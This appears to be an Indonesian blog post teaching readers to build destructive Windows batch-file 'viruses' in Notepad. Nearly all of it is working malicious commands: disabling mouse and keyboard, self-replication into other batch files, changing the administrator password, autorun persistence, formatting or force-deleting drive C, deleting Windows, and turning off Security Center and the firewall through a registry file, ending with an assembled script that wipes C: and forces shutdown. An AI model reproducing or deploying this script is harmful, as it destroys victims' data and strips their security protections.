Mungkin ini sedikit berguna buat sobat-sobat yang suka bermain dengan virus yang memakai ekstensi .bat. ya udah kita mulai praktekan aja yah... hehehe :D
Script virus berekstensi .bat hanya terdiri dari beberapa kata perintah seperti echo, pause, cls dan beberapa script perintah jika kita ingin bermain diregistri komputer.
Saya tidak menyarankan anda untuk menjalankan virus ini dikomputer sendiri ! Virus ini dibuat dengan Notepad dan di save as dengan ekstension .bat Jangan lupa untuk merubah Save as type menjadi All files.
1. BASIC
Invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
Buka URL yg diinginkan
start [url]http://www.google.com[/url]
Shutdown kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse setelah Restart
rundll32 mouse,disable
Disable keyboard setelah Restart
rundll32 keyboard,disable
Freezes komputer setelah Restart
rundll32 user,disableoemlayer
2. Worm
Memperbanyak Diri di Dalam Direktori :
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
Me-replace File Batch yang Lain
%0 >>other.bat
Trojan :
Mengirim daftar file dalam direktori
dir *.*>>Filelist.txt
Ganti Password Admin
net user administrator PASSWORD HERE
Membuat Info IP
ipconfig >Computer-IP-address.txt
3. Perusak
Copy ke Autorun
COPY %0 %windir%WINSTART.BAT
Format Drive C
format c: /q /autotest
Delete Windows
DELTREE /Y %windir%
Delete Drive C dengan Paksa
DEL /F /S /Q C:
Mematikan Firewall & Security Center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
Pause
Pause Sampai Tekan Sembarang Tombol
Pause
Pause 20 Detik
@ping.exe 127.0.0.1 -n 20 -w 1000 > nul
Berikut Hasil Akhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
[-] Disables mouse & keyboard
[-] Copy ke AUTORUN
[-] Stop Security Center
[-] Display "Anda kena VIRUS!!!" selama 5 detik
[-] Starts [url]http://www.youtube.com[/url]
[-] Disable firewall
[-] Delete c: drive
[-] Force shutdown dengan pesan "Ucapkan selamat tinggal pada komputermu!"
Oke, Sekian dulu gan. dan jangan taruh virus ini di dalam komputermu! Semoga Bermanfaat :)
0 komentar:
Posting Komentar